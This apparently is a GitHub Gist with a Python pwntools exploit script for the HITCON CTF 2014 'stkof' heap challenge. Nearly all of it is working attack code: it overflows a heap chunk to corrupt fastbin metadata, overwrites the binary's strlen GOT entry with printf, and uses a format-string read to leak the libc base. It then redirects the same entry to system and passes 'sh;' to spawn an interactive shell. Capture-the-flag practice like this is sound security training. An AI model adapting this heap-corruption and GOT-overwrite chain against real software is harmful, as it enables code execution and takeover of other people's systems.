Created
April 28, 2017 04:06
-
-
Save icchy/80470fa6733b9fdfc41403153a243019 to your computer and use it in GitHub Desktop.
HITCON CTF 2014 stkof
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from pwn import * | |
| context(os='linux', arch='amd64') | |
| context.log_level = 'debug' # output verbose log | |
| RHOST = "127.0.0.1" | |
| RPORT = 10080 | |
| LHOST = "127.0.0.1" | |
| LPORT = 10080 | |
| libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') | |
| elf = ELF('./a679df07a8f3a8d590febad45336d031-stkof') | |
| def section_addr(name, elf=elf): | |
| return elf.get_section_by_name(name).header['sh_addr'] | |
| conn = None | |
| if len(sys.argv) > 1: | |
| if sys.argv[1] == 'r': | |
| conn = remote(RHOST, RPORT) | |
| elif sys.argv[1] == 'l': | |
| conn = remote(LHOST, LPORT) | |
| elif sys.argv[1] == 'd': | |
| execute = """ | |
| # set environment LD_PRELOAD= | |
| b *{0} | |
| c | |
| """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint)) | |
| conn = gdb.debug(['./a679df07a8f3a8d590febad45336d031-stkof'], execute=execute) | |
| conn.recvline() | |
| else: | |
| conn = process(['./a679df07a8f3a8d590febad45336d031-stkof']) | |
| # conn = process(['./a679df07a8f3a8d590febad45336d031-stkof'], env={'LD_PRELOAD': ''}) | |
| # preparing for exploitation | |
| log.info('Pwning') | |
| def alloc(size): | |
| conn.sendline("1") | |
| conn.sendline(str(size)) | |
| res = conn.recvline() | |
| if "FAIL" in res: | |
| return -1 | |
| else: | |
| conn.recvuntil("OK\n") | |
| return int(res) | |
| def read(idx, data): | |
| conn.sendline("2") | |
| conn.sendline(str(idx)) | |
| conn.sendline(str(len(data))) | |
| conn.send(data) | |
| res = conn.recvline() | |
| if "FAIL" in res: | |
| return False | |
| elif "OK" in res: | |
| return True | |
| def free(idx): | |
| conn.sendline("3") | |
| conn.sendline(str(idx)) | |
| res = conn.recvline() | |
| if "FAIL" in res: | |
| return False | |
| elif "OK" in res: | |
| return True | |
| for _ in range(0x20): | |
| alloc(10) | |
| free(2) | |
| exploit = "A"*0x10 + "A"*8 + pack(0x21)+pack(0x602100-0x8) | |
| read(1, exploit) | |
| alloc(10) # fastbins unlink attack | |
| idx = alloc(10) # 0x602100-0x8 | |
| pad = "A"*(0x602140 - 0x602108 + 0x8) | |
| read(idx, pad+pack(elf.got['strlen'])) | |
| read(1, pack(elf.symbols['printf'])) # GOT overwrite | |
| read(3, "%41$p\n\x00") | |
| conn.sendline("4") | |
| conn.sendline("3") | |
| libc_start_main = int(conn.recvline(), 16) | |
| libc_base = libc_start_main - (libc.symbols['__libc_start_main'] + 245) | |
| libc_system = libc_base + libc.symbols['system'] | |
| log.info('libc_system: 0x{0:x}'.format(libc_system)) | |
| read(idx, pad+pack(elf.got['strlen'])) | |
| read(1, pack(libc_system)) # GOT overwrite | |
| read(3, "sh;") | |
| conn.sendline("4") | |
| conn.sendline("3") | |
| conn.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment